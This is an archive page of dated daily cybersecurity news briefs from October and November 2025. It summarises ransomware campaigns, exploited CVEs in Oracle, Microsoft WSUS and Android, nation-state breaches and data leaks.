This cybersecurity brief for November 6, 2025, covers a landmark shift in the threat landscape with Google's discovery of AI-powered malware like PROMPTFLUX, which uses LLMs to mutate its own code. Concurrently, a critical zero-click RCE vulnerability (CVE-2025-48593) was disclosed for Android versions 13-16, posing a severe risk to billions of users. Other major incidents include the Qilin ransomware gang's claimed breach of Habib Bank AG Zurich, a cyberattack on the U.S. Congressional Budget Office, and a supply chain attack by Cl0p impacting The Washington Post via an Oracle zero-day.

Nov 5, 2025 · 7 articles

Critical Infrastructure Under Fire: CISA Warns of Major ICS Flaws, State-Sponsored Actor Breaches F5 BIG-IP

This cybersecurity brief for November 5, 2025, covers a series of high-stakes threats targeting critical infrastructure and enterprise security. CISA has disclosed severe vulnerabilities in industrial control systems from five vendors, while a state-sponsored actor has breached F5, compromising its BIG-IP source code and creating a significant supply chain risk. Other major developments include the evolution of the DragonForce ransomware group into a 'cartel' with ties to Scattered Spider, the indictment of cybersecurity insiders for deploying BlackCat ransomware, and a massive data breach at a Swedish IT firm exposing 1.5 million individuals' data. These events underscore the growing threats to OT environments, the sophistication of ransomware actors, and the persistent danger of insider threats and cloud misconfigurations.

Nov 4, 2025 · 6 articles

Insider Threats, Zero-Days, and Ransomware Shake Global Cybersecurity Landscape

This 24-hour cybersecurity brief for November 4, 2025, covers critical developments including the indictment of cybersecurity professionals for running a BlackCat ransomware ring, a severe zero-click RCE in Android, and a new Cl0p campaign exploiting an Oracle zero-day. Reports also highlight the emergence of the Conti-derived DragonForce ransomware and the massive financial fallout for SK Telecom after a major data breach.

Nov 3, 2025 · 5 articles

Chinese APT 'Airstalk' Malware Targets BPO Supply Chains; Insider Threats and Cl0p Zero-Day Exploits Escalate

This cybersecurity brief for November 3, 2025, covers a surge in sophisticated threats. Key developments include the discovery of 'Airstalk,' a new Chinese APT malware using MDM APIs for C2 in supply chain attacks against the BPO sector. In a shocking insider threat case, cybersecurity professionals were indicted for using ALPHV/BlackCat ransomware. The Cl0p ransomware group is actively exploiting an Oracle zero-day (CVE-2025-61882), while an unpatched Windows LNK flaw (CVE-2025-9491) continues to be leveraged by APTs. Additionally, new reports highlight advanced phishing on LinkedIn, the massive financial fallout from the SK Telecom breach, and escalating ransomware attacks across Europe.

Nov 2, 2025 · 7 articles

Penn Breach Exposes 1.2M Records; Critical Android Zero-Click & Chinese APTs Target Zero-Days

This cybersecurity brief for November 2, 2025, covers a series of high-impact security incidents. A massive data breach at the University of Pennsylvania has allegedly exposed 1.2 million donor records. Google has issued an urgent patch for a critical zero-click RCE vulnerability in Android. Meanwhile, Chinese state-sponsored threat actors, including Bronze Butler and UNC6384, are actively exploiting zero-day vulnerabilities in Lanscope and Windows systems to deploy malware and spy on targets in Europe and Asia. Other significant events include a major data breach at a Polish loan company and an Australian government warning about new malware targeting Cisco devices.

Nov 1, 2025 · 8 articles

China-Linked Actors Exploit Windows & VMware Zero-Days; Ransomware Gangs Hit Major Corporations

This cybersecurity brief for November 1, 2025, covers a surge in state-sponsored cyber-espionage and critical zero-day exploitation. Chinese-linked threat actors are actively leveraging an unpatched Windows vulnerability (CVE-2025-9491) to spy on European diplomats and a now-patched VMware flaw (CVE-2025-41244) for privilege escalation. Concurrently, ransomware remains a dominant threat, with the Akira group claiming a breach at Apache OpenOffice, RansomHouse hitting Japanese retailer Askul, and a massive data breach at Conduent affecting over 10.5 million individuals. Other significant developments include the discovery of new malware families 'KYBER' and 'Airstalk', a supply chain attack on the npm registry, and an ongoing campaign targeting Cisco devices in Australia.

Oct 31, 2025 · 7 articles

PhantomRaven Supply Chain Attack Hits npm; Conduent Breach Exposes 10.5M; CISA Flags Actively Exploited Flaws

This cybersecurity brief for October 31, 2025, covers a surge in sophisticated threats. Highlights include the 'PhantomRaven' supply chain attack on npm using novel evasion techniques, a massive data breach at Conduent affecting 10.5 million individuals, and CISA adding critical, actively exploited vulnerabilities in XWiki and VMware to its KEV catalog. Other major incidents include a prolonged nation-state breach at a key telecom provider, a significant Azure outage, and escalating ransomware campaigns from the Qilin group.

Oct 30, 2025 · 7 articles

Microsoft Azure Outage Causes Global Chaos; CISA Warns of Actively Exploited WSUS Flaw

This cybersecurity brief for October 30, 2025, covers a widespread Microsoft Azure outage triggered by a configuration error, a critical CISA alert for an actively exploited Windows Server vulnerability (CVE-2025-59287), and massive data breaches at government contractor Conduent and consulting giant EY. New threats include the 'Herodotus' Android malware and the 'logins[.]zip' infostealer, while the UK government considers a ransomware payment ban in response to escalating attacks.

Oct 29, 2025 · 6 articles

Urgent WSUS Patch Mandated Amidst Wave of Zero-Day Exploits Targeting Oracle, Chrome, and AI Agents

This cybersecurity brief for October 29, 2025, covers a series of critical threats, led by an urgent CISA directive to patch an actively exploited, wormable RCE vulnerability in Windows Server Update Services (CVE-2025-59287). The threat landscape is further defined by major zero-day attacks, with the FIN11/Clop ransomware group targeting Oracle EBS systems at industrial giants, and the 'Mem3nt0 mori' APT exploiting a Chrome zero-day. New malware strains have also emerged, including 'Airstalk' in a suspected nation-state supply chain attack and 'Herodotus', an Android trojan that mimics human behavior. Additionally, a report highlights the destructive impact of the 'Scattered Spider' group and a massive surge in AI-powered vishing attacks.

Oct 28, 2025 · 7 articles

CISA Warns of Actively Exploited Zero-Days in Fortinet & Dassault Systems; Massive Infostealer Dump Exposes 183M Credentials

This 24-hour period is marked by critical zero-day vulnerabilities and massive data exposure events. CISA has added actively exploited flaws in Fortinet's FortiWeb and Dassault Systèmes' DELMIA Apriso products to its KEV catalog, demanding urgent patching from federal agencies. Concurrently, a colossal dataset of 183 million credentials, harvested by infostealer malware like RedLine and Vidar, has been discovered, heightening the risk of widespread credential stuffing attacks. Other significant events include a supply chain breach at healthcare vendor Cerner, new ransomware attacks by Safepay and BlueNoroff, and disclosures of vulnerabilities in Apache Tomcat and OpenAI's new Atlas browser.

Oct 27, 2025 · 13 articles

Microsoft Scrambles to Patch Actively Exploited WSUS Flaw as Qilin Ransomware Surges

In cybersecurity news for October 27, 2025, Microsoft issued an emergency patch for a critical, actively exploited remote code execution vulnerability in Windows Server Update Services (WSUS). Concurrently, reports indicate the Qilin ransomware group has become the most prolific operator of 2025, claiming over 700 victims. Other major incidents include a massive China-linked smishing campaign using over 194,000 domains, active exploitation of a critical flaw in Adobe Commerce, and a series of data breaches affecting the retail and healthcare sectors.

Oct 26, 2025 · 6 articles

Microsoft Scrambles to Patch Actively Exploited WSUS Flaw; Dublin Airport Breach Hits 3.8M

This cybersecurity brief for October 26, 2025, covers several critical global incidents. A severe, actively exploited remote code execution vulnerability (CVE-2025-59287) in Microsoft's WSUS has prompted an emergency out-of-band patch, with CISA mandating immediate action. In a massive supply chain attack, Dublin Airport disclosed a data breach affecting 3.8 million passengers after a third-party provider, Collins Aerospace, was compromised by ransomware. Meanwhile, a DDoS attack on Russia's food safety agency crippled national supply chains, the Safepay ransomware group targeted a German video surveillance firm, and dozens of nations signed a landmark, albeit controversial, UN cybercrime treaty in Hanoi.

Oct 25, 2025 · 2 articles

CISA Issues Emergency Directive for Actively Exploited Microsoft WSUS Flaw; Ransomware Surges 50% in 2025

This cybersecurity brief for October 25, 2025, covers critical developments, led by an emergency CISA directive for an actively exploited remote code execution vulnerability (CVE-2025-59287) in Microsoft's Windows Server Update Services (WSUS). Other major stories include Microsoft's massive October Patch Tuesday fixing 193 flaws and six zero-days, a reported 50% surge in ransomware attacks in 2025 driven by new groups like Qilin, the resurgence of the LockBit ransomware gang with a new 'LockBit 5.0' variant, and a massive 'Smishing Triad' campaign using over 194,000 malicious domains. Global policy shifts are also noted, with the UK and Singapore launching a supply chain security initiative and the UN finalizing its Convention against Cybercrime.

Oct 24, 2025 · 8 articles

Critical WSUS Zero-Day Exploited, Prosper Breach Hits 17.6M, and Iranian APT Deploys 'Phoenix' Backdoor

This reporting period, October 23-24, 2025, has been marked by significant and active threats. A critical, actively exploited zero-day vulnerability (CVE-2025-59287) in Microsoft's WSUS has prompted an emergency patch and a CISA KEV alert, posing a severe risk to enterprise networks. In the financial sector, a massive data breach at Prosper Marketplace has exposed the highly sensitive personal and financial data of 17.6 million users. Concurrently, nation-state activity surged with an Iranian-linked APT group targeting over 100 government institutions globally using a new 'Phoenix' backdoor. Other major incidents include Google patching its sixth actively exploited Chrome zero-day of the year and multiple high-impact ransomware attacks affecting manufacturing, education, and critical infrastructure sectors.

Oct 23, 2025 · 10 articles

Ransomware Automation Slashes Attack Times to Minutes; Supply Chain Overconfidence Creates Massive Risk

In cybersecurity news for October 23, 2025, the threat landscape is defined by escalating speed and systemic risk. A new report reveals ransomware groups are using automation to compress attack timelines to just 18 minutes from initial access to lateral movement. Simultaneously, another study highlights a dangerous overconfidence in supply chain security, with 94% of firms feeling prepared despite a third failing to conduct basic supplier risk assessments. This is underscored by the staggering £1.9 billion economic cost of the Jaguar Land Rover hack, which cascaded through 5,000 supply chain organizations. Regulators are responding, with New York's DFS issuing new guidance on third-party risk. Meanwhile, CISA has added another actively exploited vulnerability to its KEV catalog, demanding immediate action from federal agencies.

Oct 22, 2025 · 7 articles

Ransomware Surges, JLR Hack Costs UK £1.9B, and 'GlassWorm' Hits Developers in Widespread Attacks

This cybersecurity advisory for October 21-22, 2025, covers a dramatic 34% surge in ransomware attacks against global critical infrastructure, with the U.S. being the top target. A separate analysis reveals the staggering economic fallout of a cyberattack on Jaguar Land Rover, costing the UK economy an estimated £1.9 billion. A sophisticated new worm, 'GlassWorm', is spreading through the VS Code ecosystem using invisible code to infect developers. Additionally, critical vulnerabilities have been disclosed in the Netty Java library and Oracle's E-Business Suite, while the UK government issues an urgent call for businesses to bolster defenses.

Oct 21, 2025 · 4 articles

Citrix Zero-Day Hits US Gov; APTs & Sophisticated Malware Campaigns Surge Globally

This intelligence brief for October 21, 2025, covers a series of high-impact cybersecurity events. A critical Citrix zero-day, 'CitrixBleed 2.0', led to a major data breach at the U.S. Department of Homeland Security, exposing employee data. Nation-state activity remains high, with China-linked Salt Typhoon targeting European telecoms and Russia-linked COLDRIVER rapidly deploying new malware after public disclosure. A novel supply chain attack, 'GlassWorm', is targeting VS Code developers using advanced obfuscation and a blockchain-based C2. Meanwhile, new reports highlight a 34% surge in ransomware attacks on critical infrastructure and the growing challenge of AI-powered cyberattacks outpacing organizational defenses.

Oct 20, 2025 · 8 articles

CISA Mandates Patches for Exploited Flaws; Nation-State Actors Breach F5 and Prosper Suffers Massive Data Leak

This cybersecurity brief for October 20, 2025, covers a series of high-impact events. CISA has added five actively exploited vulnerabilities to its KEV catalog, mandating urgent patching. In a significant supply-chain threat, a nation-state actor breached F5, stealing BIG-IP source code. Meanwhile, the Prosper lending platform disclosed a massive data breach affecting 17.6 million users, and the Cl0p ransomware gang is exploiting a new zero-day in Oracle E-Business Suite. These incidents highlight escalating threats across patch management, supply chain security, and data protection.

Oct 19, 2025 · 9 articles

Europol Busts 'SIMCARTEL' CaaS Network; Everest Ransomware Claims Collins Aerospace Attack

This cybersecurity brief for October 19, 2025, covers major international law enforcement actions, high-profile ransomware claims, and critical vulnerability disclosures. Key events include the dismantling of the 'SIMCARTEL' Cybercrime-as-a-Service platform in Europe, the Everest ransomware group claiming responsibility for the disruptive Collins Aerospace attack, and Microsoft's revocation of over 200 malicious certificates used by the Vanilla Tempest group. Additionally, CISA has issued warnings for two actively exploited Windows zero-day vulnerabilities, and a critical RCE flaw has been patched in Microsoft WSUS.

Oct 18, 2025 · 6 articles

Nation-State Actors Breach F5 Networks Stealing BIG-IP Source Code; AI Phishing Effectiveness Skyrockets

This cybersecurity brief for October 18, 2025, covers a critical supply chain attack against F5 Networks by a nation-state actor, resulting in the theft of BIG-IP source code and unpatched vulnerability data. Other major developments include a Microsoft report revealing AI-powered phishing is 4.5 times more effective, active exploitation of a Cisco zero-day to deploy rootkits, and the Clop ransomware group breaching an American Airlines subsidiary via Oracle EBS flaws. The period also saw rising ransomware attacks targeting healthcare and increased warnings about supply chain security from the UK's NCSC.

Oct 17, 2025 · 9 articles

Microsoft Patches Three Zero-Days, F5 Suffers Nation-State Breach, and Critical Adobe Flaw Actively Exploited

This cybersecurity brief for October 17, 2025, covers a massive Microsoft Patch Tuesday addressing over 172 vulnerabilities, including three actively exploited zero-days. In other major news, F5 Networks disclosed a significant breach by a nation-state actor resulting in source code theft, and CISA issued an urgent warning for a critical, actively exploited Adobe AEM vulnerability with a 10.0 CVSS score. Additional stories include a massive data breach at lending platform Prosper affecting 17.6 million users, a surge in AKIRA ransomware attacks targeting Swiss companies, and new regulatory pressures from a stricter data breach notification law in California.

Oct 16, 2025 · 8 articles

CISA Emergency Directive Issued After F5 Source Code Theft by Nation-State Actor; Microsoft Patches Four Actively Exploited Zero-Days

This cybersecurity brief for October 16, 2025, covers a critical supply chain threat following the theft of F5 source code by a Chinese nation-state actor, prompting a CISA emergency directive. Concurrently, Microsoft's October Patch Tuesday addresses over 170 flaws, including four actively exploited zero-days. Other major events include the disruption of a ransomware campaign using signed malware, the discovery of a Chinese APT targeting a Russian IT firm, a massive data breach affecting two major airlines, and the disclosure of critical flaws in industrial control systems.

Oct 15, 2025 · 5 articles

Microsoft Patches 172 Flaws and Six Zero-Days; F5 Discloses Nation-State Breach Stealing BIG-IP Source Code

This intelligence briefing for October 15, 2025, covers a massive Microsoft Patch Tuesday addressing 172 vulnerabilities, including three actively exploited zero-days. A critical supply chain threat emerges as F5 discloses a long-term breach by a nation-state actor who stole BIG-IP source code, prompting a CISA emergency directive. Other major developments include the return of the LockBit ransomware group with an upgraded version, a surge in overall ransomware attacks, and multiple data breach and vulnerability disclosures affecting companies like Canadian Tire and Fortinet.

Oct 14, 2025 · 6 articles

Microsoft's Massive October Patch Tuesday Fixes 175 Flaws and 3 Zero-Days; F5 Discloses Nation-State Breach

This cybersecurity advisory for October 14, 2025, covers a record-breaking Microsoft Patch Tuesday addressing 175 vulnerabilities, including three actively exploited zero-days. Additionally, F5 disclosed a major breach by a nation-state actor, resulting in the theft of BIG-IP source code and a CISA emergency directive. Other significant events include new campaigns by Chinese APTs Flax Typhoon and Jewelbug, a novel phishing attack abusing NPM infrastructure, and ongoing ransomware activity from the Qilin group.

Oct 13, 2025 · 7 articles

Critical Oracle Zero-Day Exploited by TA505 & Cl0p; Discord Vendor Breach Exposes 70,000 IDs

This cybersecurity brief for October 13, 2025, covers a critical zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite being actively exploited by major extortion groups, leading to widespread data theft. Other significant events include a major data breach at a Discord third-party vendor exposing 70,000 user IDs, a novel phishing campaign abusing NPM infrastructure, and a report showing a 30% surge in ransomware attacks against healthcare vendors.

Oct 12, 2025 · 8 articles

Massive Supply Chain Attacks Expose Millions; Clop Ransomware Targets Harvard and Oracle

In the period covering October 12, 2025, the cybersecurity landscape was dominated by large-scale supply chain attacks and aggressive ransomware campaigns. A hacker collective dubbed 'Scattered Lapsus$ Hunters' leaked data for 5.7 million Qantas customers and 7.3 million Vietnam Airlines customers after compromising a shared Salesforce environment. Concurrently, the Clop ransomware gang claimed a breach of Harvard University and was found actively exploiting a zero-day in Oracle E-Business Suite; Oracle also released an emergency patch for a separate, newly discovered high-severity flaw in the same product. Other significant events include the abuse of the Velociraptor DFIR tool to deploy ransomware and reports of North Korean hackers stealing a record $2 billion in crypto assets in 2025.

Oct 11, 2025 · 7 articles

Critical Flaws in Oracle & Redis Under Active Threat; Widespread Supply Chain Attacks Target Developers and Cloud Services

This intelligence briefing for October 11, 2025, covers a series of critical cybersecurity incidents. Major themes include the active exploitation of a zero-day in Oracle E-Business Suite by the Cl0p ransomware group and the patching of a 13-year-old RCE flaw in Redis. Supply chain attacks remain a dominant threat, with malicious npm and Node.js packages targeting developers, and a Discord breach originating from a third-party vendor. SonicWall disclosed two major incidents: active exploitation of its VPNs by Akira ransomware and a full-scale breach of its Cloud Backup service affecting all customers. Additionally, new malware strains like 'Chaosbot' and the AI-powered 'MalTerminal' demonstrate evolving attacker TTPs.

Oct 10, 2025 · 8 articles

Cl0p Exploits Oracle Zero-Day in Massive Extortion Spree; SonicWall Breach Hits All Cloud Backup Users

This cybersecurity brief for October 10, 2025, covers a critical period marked by high-impact zero-day exploitation and significant data breaches. A Cl0p-affiliated group has been exploiting an Oracle E-Business Suite zero-day (CVE-2025-61882) for months, leading to an FBI warning. Concurrently, SonicWall admitted a breach impacted all cloud backup customers, exposing firewall configurations. Other major incidents include the 'CamoLeak' flaw in GitHub Copilot allowing code exfiltration, a supply chain breach at crypto platform Shuffle.com, and the emergence of new ransomware and APT groups.

Oct 9, 2025 · 9 articles

Cl0p Exploits Oracle Zero-Day; Threat Actors Weaponize Legitimate Security Tools in Widespread Attacks

This cybersecurity brief for October 9, 2025, covers a surge in critical threats, led by the Cl0p ransomware gang's exploitation of a zero-day vulnerability (CVE-2025-61882) in Oracle's E-Business Suite. A significant trend this period is the abuse of legitimate tools, with threat actors weaponizing the Velociraptor DFIR tool and exploiting a critical flaw (CVE-2025-10035) in Fortra's GoAnywhere MFT. Other major events include the Qilin ransomware attack on Japanese beverage giant Asahi, a sophisticated phishing campaign targeting marketing professionals, new guidance from the G7 and the UK's NCSC on managing AI risks, and a sharp rise in national-level cyberattacks.

Oct 8, 2025 · 8 articles

Salesforce Defies Extortionists After Customer Data Heist; Cl0p Exploits Critical Oracle Zero-Day

This cybersecurity brief for October 8, 2025, covers several critical incidents. A threat actor alliance named 'Scattered LAPSUS$ Hunters' claims to have stolen data from over 40 Salesforce customers via social engineering, though Salesforce itself was not breached and refuses to pay the ransom. Concurrently, the Cl0p ransomware group is actively exploiting a critical zero-day vulnerability (CVE-2025-61882) in Oracle's E-Business Suite. Other major events include a significant data breach at a Red Hat consulting GitLab instance exposing sensitive client data, a ransomware attack by the Qilin group on Japanese beverage giant Asahi, and CISA adding a Zimbra XSS flaw to its KEV catalog.

Oct 7, 2025 · 9 articles

Clop Exploits Oracle Zero-Day; CISA Catalogs Multiple Actively Exploited Flaws

This cybersecurity advisory for October 7, 2025, covers a critical period marked by the active exploitation of a zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite by the Clop ransomware group, prompting urgent international warnings. Concurrently, CISA has added several other flaws to its KEV catalog, including vulnerabilities in Microsoft Windows and Zimbra. Other major developments include a new extortion campaign by the 'Scattered Lapsus$ Hunters' collective targeting Salesforce customers, a critical RCE flaw in Redis, and Signal's threat to exit the EU over the proposed 'Chat Control' surveillance bill.

Oct 6, 2025 · 10 articles

Microsoft Patches 3 Zero-Days Under Active Attack; Cl0p, Qilin, and Flax Typhoon Launch Major Campaigns

In the period of October 5-6, 2025, the cybersecurity landscape was dominated by Microsoft's massive October Patch Tuesday, which addressed 175 vulnerabilities including three actively exploited zero-days. Concurrently, major threat actors launched significant campaigns: the Cl0p ransomware group exploited a zero-day in Oracle E-Business Suite for mass extortion, the Qilin gang crippled Asahi Breweries demanding a $10M ransom, and the Chinese APT Flax Typhoon was found using a novel ArcGIS server backdoor for long-term espionage. Other key events include a major escalation in the SonicWall data breach, a novel phishing technique abusing the NPM registry, and new warnings from CISA regarding widespread ICS vulnerabilities.

Oct 5, 2025 · 10 articles